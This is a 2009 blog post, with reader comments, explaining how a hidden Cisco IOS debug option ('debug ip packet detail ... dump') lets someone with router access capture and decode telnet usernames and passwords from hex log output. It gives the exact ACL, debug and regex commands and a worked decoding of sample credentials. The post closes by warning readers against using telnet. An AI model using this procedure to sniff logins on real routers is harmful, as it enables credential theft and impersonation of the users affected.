Thursday, March 19, 2009

Decoding telnet passwords using a hidden debug

While messing with packet capture, i found an interesting feature, well hidden inside IOS.

Almost all of you should probably know the command "debug ip packet detail" which displays details about process switched (received/generated/forwarded) packets. There is a hidden option "dump" that provides extra information including raw packet data in hexadecimal and ASCII forms. According to Cisco, "the dump keyword is not fully supported and should be used only in collaboration with Cisco Technical Support. Because of the risk of using significant CPU utilization, the dump keyword is hidden from the user and cannot be seen using the "?" prompt."

What makes nasty-interesting this command is that you are able to get the credentials of everyone logging into the router through a unencrypted method, i.e. telnet (packets destined to the router are always process switched) and then impersonate him/her. Some other debug methods (i.e. aaa auth, tacacs, radius) hide the password field in their output.

First of all, you have to create an acl that matches the source of the victim and the destination port of telnet. This is not mandatory, but it'll help you keep logs to a minimum.


access-list 111 permit tcp host x.x.x.x any eq telnet

If you don't know the source ip, you can simply use "any".

access-list 111 permit tcp any any eq telnet

Then you have to enable detailed ip packet debugging for the above acl and wait for the victim to appear.

router#debug ip packet detail 111 ?
<cr>

router#debug ip packet detail 111 dump
IP packet debugging is on (detailed) (dump) for access list 111

After the victim has successfully logged in, you can use the following regexp in order to get the useful logs for decoding his/her credentials :

router#sh log | i ^.+: .+ .+ ....0000 [0-9|A-F]+ .+
07B131A0: 00000000 60022238 919B0000 020405B4 ....`."8.......4
07B15D60: 2932EDFC 50182238 35A80000 FFFD03FF )2m|P."85(...}..
07B3F660: 2932EE08 50182238 95610000 FFFD01FF )2n.P."8.a...}..
07B09CE0: 2932EE63 50182238 D4D40000 FFFA1800 )2ncP."8TT...z..
07B1BDA0: 2932EE66 50182238 1B740000 76 )2nfP."8.t..v
07AFD3A0: 2932EE67 50182238 28720000 69 )2ngP."8(r..i
07B203A0: 2932EE68 50182238 2E700000 63 )2nhP."8.p..c
07B0FD20: 2932EE69 50182238 1D6E0000 74 )2niP."8.n..t
07B1FAE0: 2932EE6A 50182238 286C0000 69 )2njP."8(l..i
07B19AA0: 2932EE6B 50182238 246A0000 6D )2nkP."8$j..m
07B27560: 2932EE6C 50182238 84670000 0D00 )2nlP."8.g....
07B263E0: 2932EE78 50182238 285A0000 69 )2nxP."8(Z..i
07B1C660: 2932EE78 50182238 50590000 41 )2nxP."8PY..A
07B02260: 2932EE78 50182238 44580000 4D )2nxP."8DX..M
07B2A9E0: 2932EE78 50182238 1D570000 74 )2nxP."8.W..t
07B22F60: 2932EE78 50182238 29560000 68 )2nxP."8)V..h
07B26CA0: 2932EE78 50182238 2C550000 65 )2nxP."8,U..e
07B2F8A0: 2932EE78 50182238 3F540000 52 )2nxP."8?T..R
07B312E0: 2932EE78 50182238 22530000 6F )2nxP."8"S..o
07B2B2A0: 2932EE78 50182238 22520000 6F )2nxP."8"R..o
07B33EA0: 2932EE78 50182238 22510000 6F )2nxP."8"Q..o
07AFB960: 2932EE78 50182238 89500000 08 )2nxP."8.P...
07B20C60: 2932EE78 50182238 894F0000 08 )2nxP."8.O...
07B2BB60: 2932EE78 50182238 894E0000 08 )2nxP."8.N...
07B34760: 2932EE78 50182238 424D0000 4F )2nxP."8BM..O
07B226A0: 2932EE78 50182238 424C0000 4F )2nxP."8BL..O
07B3DC20: 2932EE78 50182238 3D4B0000 54 )2nxP."8=K..T
07B4E2A0: 2932EE78 50182238 84490000 0D00 )2nxP."8.I....

You're mostly interested in the last hex column (telnet data is at the end of the packet) and you can safely ignore everything that looks abnormal (like FF). Looking at the ascii table, you can see that hex 0D translates to CR (CarriageReturn) and hex 08 translates to BS (BackSpace). So the ascii character stream of the last hex column is :

v
i
c
t
i
m
CR (CarriageReturn) - "Enter" is pressed
i
A
M
t
h
e
R
o
o
o
BS (BackSpace) - 1st "o" is deleted
BS (BackSpace) - 2nd "o" is deleted
BS (BackSpace) - 3rd "o" is deleted
O
O
O
T
CR (CarriageReturn) - "Enter" is pressed

which translates to username "victim" and password "iAMtheROOT".

Keep in mind that you might see more characters in the same line, if the input is keyed in quickly by the user. If you see 4 chars, then you'll have to check manually for the existence of the rest of the data. You're always looking for 0D00 in order to find the end of each input.

router#sh log | i ^.+: .+ .+ ....0000 [0-9|A-F]+ .+
07B1D7E0: 05DE7766 50182238 219F0000 FFFD03FF .^wfP."8!....}..
07B079E0: 05DE7772 50182238 81580000 FFFD01FF .^wrP."8.X...}..
07B16EE0: 05DE77C7 50182238 BCF80000 FFFA1800 .^wGP."8<x...z..
07B14320: 05DE77CD 50182238 59730000 FFFB24 .^wMP."8Ys...{$
07B25B20: 05DE77D0 50182238 3A1B0000 76696374 .^wPP."8:...vict
07B588E0: 05DE77D6 50182238 705E0000 0D00 .^wVP."8p^....
07B45F60: 05DE77E2 50182238 BC890000 69414D74 .^wbP."8<...iAMt
07B2E720: 05DE77E2 50182238 70460000 0D00 .^wbP."8pF....

router#sh log | b 07B25B20
07B25B20: 05DE77D0 50182238 3A1B0000 76696374 .^wPP."8:...vict
07B25B30: 696D im

router#sh log | b 07B45F60
07B45F60: 05DE77E2 50182238 BC890000 69414D74 .^wbP."8<...iAMt
07B45F70: 6865524F 4F54 heROOT


Notes :

1. Probably a tcl script could decode the above debug outputs much easier/better.

2. You can also include other ips (i.e. aaa server) in your acl in order to watch -probably- easier (i.e. look for Username/Password strings) the whole login process, because in the packet data you'll find everything the user types.

3. The beginning of a packet may start at different locations in the dump output depending on the specific router, interface type, and packet header processing that may have occurred before the output is displayed.

4. The length of the displayed packet information may exceed the actual packet length and include additional padding bytes that do not belong to the actual IP packet.


So, next time you decide to use telnet to login into a router, you'd better think twice before doing so. Besides sniffing on the wire, someone can do sniffing on the router too.

6 comments:

  1. Awesome!! Hehe.. I ll try this out for sure.. :P
    Thanks mate.

    ReplyDelete
  2. Hi! Just tried it out on a C3640-JK9O3S-M IOS and it looks like it doesn't dump a decypherable hex log. Followed every step and this is how it the buffer looks like:

    R1#sh log | i ^........:
    07B6CA60: 65 e
    07B6D930: 18F10800 45C00028 BE350000 .q..E@.(>5..
    07B6D940: FE067A26 C0A80132 C0A80131 6D830017 ~.z&@(.2@(.1m...
    07B6D950: 5814FDC2 449B17AF 50100FAB FCB90000 X.}BD../P..+|9..
    07B6D960:
    07A00D50: 18F10800 45C00029 BE360000 .q..E@.)>6..
    07A00D60: FE067A24 C0A80132 C0A80131 6D830017 ~.z$@(.2@(.1m...
    07A00D70: 5814FDC2 449B17AF 50180FAB 84B00000 X.}BD../P..+.0..
    07A00D80: 78 x
    07A00C10: 18F10800 45C00029 BE370000 .q..E@.)>7..
    07A00C20: FE067A23 C0A80132 C0A80131 6D830017 ~.z#@(.2@(.1m...
    07A00C30: 5814FDC3 449B17B0 50180FAA 93AF0000 X.}CD..0P..*./..
    07A00C40: 69 i
    07B6DA70: 18F10800 45C00029 BE380000 .q..E@.)>8..
    07B6DA80: FE067A22 C0A80132 C0A80131 6D830017 ~.z"@(.2@(.1m...
    07B6DA90: 5814FDC4 449B17B1 50180FA9 88AE0000 X.}DD..1P..)....
    07B6DAA0: 74 t
    07B6CF30: 18F10800 45C0002A BE390000 .q..E@.*>9..
    07B6CF40: FE067A20 C0A80132 C0A80131 6D830017 ~.z @(.2@(.1m...
    07B6CF50: 5814FDC5 449B17B2 50180FA8 EFA20000 X.}ED..2P..(o"..
    07B6CF60: 0D0A ..
    07B6CCB0: 18F10800 45C00028 BE3A0000 .q..E@.(>:..
    07B6CCC0: FE067A21 C0A80132 C0A80131 6D830017 ~.z!@(.2@(.1m...
    07B6CCD0: 5814FDC7 449B17BB 50100FA0 FCB30000 X.}GD..;P.. |3..
    07B6CCE0:
    07B6DBB0: 18F10800 45C00028 BE3B0000 .q..E@.(>;..
    07B6DBC0: FE067A20 C0A80132 C0A80131 6D830017 ~.z @(.2@(.1m...
    07B6DBD0: 5814FDC7 449B17BB 50190FA0 FCAA0000 X.}GD..;P.. |*..
    07B6DBE0:
    R1#

    Any clues?

    ReplyDelete
  3. Duuh! Looks like I had a small buffer size. Increased buffer and no I'm able to see everything. Works like a charm.

    ReplyDelete
  4. Ha, nice! Very clever, well done!

    ReplyDelete
  5. Great, tested it's working for me.

    ReplyDelete
  6. Hey I was wondering if you could refer someone (or if you yourself might be interested) for a position I have available in Milwaukee WI for a certified CCIE (written & lab, must have #). This is an immediate need and we're looking for a full-time hire. Please get back to me, I can be reached at gblackman@visiongroupllc.com. Thanks.

    Best Regards,

    Gavin Blackman
    Managing Partner / Recruiting
    Vision Group Associates, LLC
    gblackman@visiongroupllc.com

    ReplyDelete

 
Creative Commons License
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.
Creative Commons License
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Greece License.